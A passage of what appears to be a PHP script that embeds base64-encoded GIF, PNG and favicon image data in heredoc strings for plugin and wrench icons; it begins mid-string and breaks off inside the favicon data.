  115. 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
  116.  
  117. EOFILE;
  118.  
  119. $pngPlugin = <<< EOFILE
  120.  
  121. iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsSAAALEgHS3X78AAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAABmklEQVR42mL4//8/AyUYIIDAxK5du1BwXEb3/9D4FjBOzZ/wH10ehkF6AQIIw4B1G7b+D09o/h+X3gXG4YmteA0ACCCsLghPbPkfm9b5PzK5439Sdg9eAwACCEyANMBwaFwTGIMMAOEQIBuGA6Mb/qMbABBAEAOQnIyMo1M74Tgiqf2/b3gVhgEAAQQmQuKa/8ekdYMxyLCgmEYMHJXc9t87FNMAgACCGgBxIkgzyDaQU5FxQGQN2AUBUXX/vULKwdgjsOQ/SC9AAKEEYlB03f+oFJABdSjYP6L6P0guIqkVjt0DisEGAAQQigEgG0AhHxBVi4L9wqvBBiEHtqs/xACAAAIbEBBd/x+Eg2ObwH4FORmGfYCaQRikCUS7B5YBNReBMUgvQABBDADaAtIIwsEx9f/Dk9pQsH9kHTh8XANKMAIRIIDAhF9ELTiQQH4FaQAZCAsskPNhyRpkK7oBAAEEMSC8GsVGkEaYIlBghcU3gbGzL6YBAAEEJnzCgP6EYs/gcjCGKQI5G4Z9QiswDAAIIAZKszNAgAEAHgFgGSNMTwgAAAAASUVORK5CYII=
  122.  
  123. EOFILE;
  124.  
  125. $pngWrench = <<< EOFILE
  126.  
  127. iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAA3NCSVQICAjb4U/gAAABO1BMVEXu7u7n5+fk5OTi4uLg4ODd3d3X19fV1dXU1NTS0tLPz8+7z+/MzMy6zu65ze65zu7Kysq3zO62zO3IyMjHx8e1yOiyyO2yyOzFxcXExMSyxue0xuexxefDw8OtxeuwxOXCwsLBwcGuxOWsw+q/v7+qweqqwuqrwuq+vr6nv+qmv+m7u7ukvumkvemivOi5ubm4uLicuOebuOeat+e0tLSYtuabtuaatuaXteaZteaatN6Xs+aVs+WTsuaTsuWRsOSrq6uLreKoqKinp6elpaWLqNijo6OFpt2CpNyAo92BotyAo9+dnZ18oNqbm5t4nt57nth7ntp4nt15ndp3nd6ZmZmYmJhym956mtJzm96WlpaVlZVwmNyTk5Nvl9lultuSkpKNjY2Li4uKioqIiIiHh4eGhoZQgtVKfNFdha6iAAAAaXRSTlMA//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////914ivwAAAACXBIWXMAAAsSAAALEgHS3X78AAAAH3RFWHRTb2Z0d2FyZQBNYWNyb21lZGlhIEZpcmV3b3JrcyA4tWjSeAAAAKFJREFUGJVjYIABASc/PwYkIODDxBCNLODEzGiQgCwQxsTlzJCYmAgXiGKVdHFxYEuB8dkTOIS1tRUVocaIWiWI8IiIKKikaoD50kYWrpwmKSkpsRC+lBk3t2NEMgtMu4wpr5aeuHcAjC9vzadjYyjn7w7lK9kK6tqZK4d4wBQECenZW6pHesEdFC9mbK0W7otwsqenqmpMILIn4tIzgpG4ADUpGMOpkOiuAAAAAElFTkSuQmCC
  128.  
  129. EOFILE;
  130.  
  131. $favicon = <<< EOFILE
  132.  
  133. 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